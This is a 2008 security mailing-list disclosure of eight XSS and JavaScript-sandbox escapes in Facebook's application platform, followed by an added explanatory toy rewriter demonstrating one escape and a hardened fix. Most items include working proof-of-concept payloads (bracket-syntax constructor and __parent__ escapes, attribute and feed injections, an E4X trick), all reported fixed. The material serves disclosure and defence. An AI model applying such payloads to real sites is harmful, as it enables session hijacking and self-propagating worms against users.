The two remaining vulnerabilities seem to have been fixed today.
Updated information:
7) Escaping JS sandbox with literal String reference
Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a String object can be referenced
using a literal expression and the "bracket syntax" to get a Window
reference.
Reported: June 21, 2008
Fixed: yes
Example:
"a"["__parent__"].eval("alert('any javascript here');");
8) Escaping JS sandbox with literal RegExp reference
Impact: execution of unrestricted JS on canvas pages or profiles
(mouseclick required on profile pages)
Browsers: FF
Description: __parent__ property of a RegExp object can be referenced
using a literal expression and the "bracket syntax" to get a Window
reference.
Reported: June 21, 2008
Fixed: yes
Example:
/a/["__parent__"].eval("alert('any javascript here');");
On Thu, Jul 3, 2008 at 2:01 AM, Jouko Pynnonen <jouko@iki.fi> wrote:
> Hello,
>
> This is a summary of various Facebook security issues found and
> reported since June 13, 2008. Two of the vulnerabilities still remain
> on the site, so no details of them are disclosed here. The rest have
> been fixed.
>
> Any of these could be exploited to take over the victim's web browser
> temporarily to e.g. read inbox messages, forcibly install FB
> applications, manipulate friend lists, post messages as the victim
> user, etc. Any of these would also allow creation of a
> self-propagating JavaScript virus/worm.
>
> Most of the issues require the victim user to click on a profile box
> or visit a canvas page of an application in order to trigger the
> injected JavaScript. Issues 2) and 3) don't require mouse clicks.
>
> The vulnerabilities were tested with two browsers: Firefox 3 (Linux +
> Windows) and Internet Explorer 7.
>
>
>
> 1) Escaping JS sandbox with literal Function constructor reference
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Description: The JS sandbox denies references to Function.constructor
> but using a literal such as "function f() { }" in the code and
> referring to its constructor with the "bracket syntax" was possible.
> The example below uses this method and calls the constructor with a
> string argument, then calls the resulting Function object.
> Browsers: FF, IE
> Reported: June 13, 2008
> Fixed: yes
> Example:
>
> (function f(){}["constructor"]("alert('any javascript here');"))();
>
>
>
> 2) Fb:silverlight JS injection
> Impact: execution of unrestricted JS on canvas pages, profiles
> Description: Simple XSS, described in the previous message to full-disclosure.
> Browsers: FF, IE
> Reported: June 16, 2008
> Fixed: yes
> Example:
>
> <fb:silverlight silverlightsrc="a"
> width="" height=",any_javascript_code_here);//" />
>
>
>
> 3) Injecting JS in Feeds
> Impact: execution of unrestricted JS when viewing Feeds on profile
> page or the "home" page
> Description: Insufficient input validation in the
> publishTemplatizedAction API method.
> Browsers: FF, IE
> Reported: June 16, 2008
> Fixed: yes
> Example:
>
> # using the perl API
>
> $facebook->feed->publish_templatized_action( title => "My Title",
> title_template => "{actor} is testing feed stories",
> body_template => "hello",
> image_1 => "http://www.mysite.com/image.gif'"
> onload=(function	f(){}['constructor']('alert(1)'))();",
> image_1_link => "http://www.mysite.com" );
>
>
>
> 4) Escaping JS sandbox with literal Number reference
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Description: Using the "bracket syntax" to reference the __parent__
> property of a floating point number to get a Window object reference,
> then calling its eval() to run arbitrary code. IE doesn't support the
> property.
> Browsers: FF
> Reported: June 18, 2008
> Fixed: yes
> Example:
>
> <script>
> 1.["__parent__"].eval("alert('any javascript here');");
> </script>
>
>
>
> 5) Injecting JS in video attachments
> Impact: execution of unrestricted JS when an inbox, wall or forum
> message is viewed (mouseclick required)
> Description: When sharing video content with the
> http://www.facebook.com/sharer.php form, some input fields can be
> modified e.g. with JavaScript. The example below can be typed in the
> address bar to inject JS in a message.
> Browsers: FF, IE
> Reported: June 20, 2008
> Fixed: yes
> Example:
>
> javascript:f=document.forms[0];f['attachment[params][video][src]'].value='#"
> a=b><img src="#" onerror=alert("hello")>
>
>
>
> 6) Escaping JS sandbox with E4X
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages). Works in browsers supporting
> E4X (Firefox)
> Description: The JS parser in browsers supporting E4X understands XML,
> which can contain multi-line strings. Facebook's JS sandbox technology
> didn't expect XML and multi-line strings. The example below
> demonstrates how this could be used to fool the sandbox logic.
> Browsers: FF
> Reported: June 26, 2008
> Fixed: yes
> Example:
>
> <script>
> <x x="
> x" {alert('any javascript')}="x"
> />
> </script>
>
>
>
> 7) Escaping JS sandbox
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Browsers: FF
> Reported: June 21, 2008
> Fixed: no
>
>
>
> 8) Escaping JS sandbox
> Impact: execution of unrestricted JS on canvas pages or profiles
> (mouseclick required on profile pages)
> Browsers: FF
> Reported: June 21, 2008
> Fixed: no
>
>
>
>
> --
> Jouko Pynnönen <jouko@iki.fi>
> http://iki.fi/jouko
> Finland
>
-- 
Jouko Pynnönen <jouko@iki.fi>
http://iki.fi/jouko
Finland
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
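The pattern behind items 1, 7 and 8 is the same: the sandbox rewrites names it sees in the source, but a property name spelled as a string literal inside brackets is not a name it sees. The following is an added example, not code from the post above and not Facebook's own FBJS implementation (the post only says the issues were fixed, not how). It is a toy source rewriter that prefixes every identifier and dotted member name with an assumed app namespace `app_`, which is enough to turn `f.constructor` into an undefined property, and then shows item 1's bracket-syntax escape getting the real Function constructor through it. The hardened variant routes every computed key through an assumed runtime helper `__key()` that applies the same prefix. The `__parent__` escapes of items 4, 7 and 8 depend on old SpiderMonkey, so the runnable demonstration uses the `constructor` escape from item 1; the names `rewrite`, `runSandboxed`, `KEEP` and the sample snippets are all constructed for this example.

```javascript
'use strict';
// Added example; not code from the post and not Facebook's FBJS.
// Weak scheme: namespace identifiers and dotted member names, pass string
// literals through. Hardened scheme: also namespace every computed key.

const PREFIX = 'app_';
// Assumed allowlist of words the rewriter must not rename.
const KEEP = new Set(['function', 'return', 'var', 'new', 'this', 'typeof',
  'if', 'else', 'true', 'false', 'null', 'undefined']);

// Minimal tokenizer: string literals, identifiers, numbers, whitespace, or
// one other character. Regex literals are not handled (toy model).
function tokenize(src) {
  const re = /"(?:[^"\\]|\\.)*"|'(?:[^'\\]|\\.)*'|[A-Za-z_$][\w$]*|\d+(?:\.\d*)?|\s+|./g;
  return src.match(re) || [];
}

const isIdent = (t) => /^[A-Za-z_$]/.test(t) && !KEEP.has(t);

// A `[` that directly follows a value (identifier, literal, `)`, `]`, `}`)
// is a computed member access; otherwise it opens an array literal.
const endsValue = (t) =>
  t !== undefined && /^[\w$"'\)\]\}]/.test(t) && (!KEEP.has(t) || t === 'this');

// Rewrites untrusted app source. hardened=false: identifiers only (the weak
// scheme). hardened=true: computed keys are wrapped in __key() as well.
function rewrite(src, hardened) {
  const out = [];
  const stack = [];   // one entry per open `[`: true if it is a member access
  let prev;           // last non-whitespace token, original spelling
  for (const t of tokenize(src)) {
    if (/^\s+$/.test(t)) { out.push(t); continue; }
    if (t === '[') {
      const member = endsValue(prev);
      stack.push(member);
      out.push(member && hardened ? '[__key(' : '[');
    } else if (t === ']') {
      out.push(stack.pop() && hardened ? ')]' : ']');
    } else if (isIdent(t)) {
      out.push(PREFIX + t);   // identifiers and dotted member names alike
    } else {
      out.push(t);            // strings, numbers, punctuation pass through
    }
    prev = t;
  }
  return out.join('');
}

// Runtime helper for the hardened rewriter: string keys get the namespace,
// numeric keys (array indices) are left alone.
function __key(k) {
  return typeof k === 'number' ? k : PREFIX + String(k);
}

// Runs app source under the chosen rewriter and reports the outcome.
function runSandboxed(src, hardened) {
  const code = rewrite(src, hardened);
  try {
    return { ok: true, value: new Function('__key', code)(__key) };
  } catch (e) {
    return { ok: false, error: e.constructor.name };
  }
}

// Item 1's technique, adapted to return a value instead of calling alert().
const ESCAPE = 'return (function f(){}["constructor"]("return 42"))();';
// The dotted form the sandbox was designed to stop.
const DOTTED = 'return (function f(){}.constructor("return 42"))();';
// Benign code that must keep working: array literal plus numeric indices.
const BENIGN = 'var a = [10, 20]; return a[1] + a[0];';

if (typeof require !== 'undefined' && require.main === module) {
  console.log('dotted, weak   :', runSandboxed(DOTTED, false));  // TypeError
  console.log('bracket, weak  :', runSandboxed(ESCAPE, false));  // value: 42, escaped
  console.log('bracket, fixed :', runSandboxed(ESCAPE, true));   // TypeError
  console.log('benign, fixed  :', runSandboxed(BENIGN, true));   // value: 30
}
```

The weak rewriter turns `f.constructor` into `app_f.app_constructor` and fails as intended, but leaves `f["constructor"]` alone, so the sandboxed code obtains a Function object whose body is compiled in the global scope, which is exactly what the post's payload does with alert(). The hardened rewriter emits `app_f[__key("constructor")]`, and `__key` returns `"app_constructor"`, so the lookup yields undefined. The regex tokenizer here is deliberately small and does not cover regex literals (item 8), E4X (item 6) or a bare `this`; a production rewriter has to work from a real parser so that every property reference, however it is spelled, reaches the namespacing step.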